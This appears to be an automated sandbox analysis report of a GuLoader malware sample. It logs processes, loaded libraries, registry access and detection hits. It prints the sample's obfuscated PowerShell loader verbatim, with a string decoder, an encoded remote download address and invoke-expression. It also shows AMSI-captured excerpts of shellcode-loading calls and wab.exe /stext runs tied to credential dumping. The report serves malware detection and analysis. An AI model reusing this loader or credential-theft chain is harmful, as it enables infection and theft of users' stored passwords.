Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF. Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1726081150.0000000008390000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf source: powershell.exe, 0000000E.00000002.1723632726.000000000741D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 0000000E.00000002.1723632726.00000000073BF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsa", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000E.00000002.1727059954.000000000BAFD000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1716933830.0000000005B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1726977424.00000000088B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1979668960.0000019E90070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Forbytter)$global:commercializing = [System.Text.Encoding]::ASCII.GetString($Rengue)$global:Uncrystallizabilities=$commercializing.substring($Kontekstfri,$Untastefulness)<#Hyperobtru
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Baghold $Kalsomining $Disapprobations), (Edsaflggelsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Taktnxr = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Praiser)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Kildeskats, $false).DefineType($Glansperioder, $M
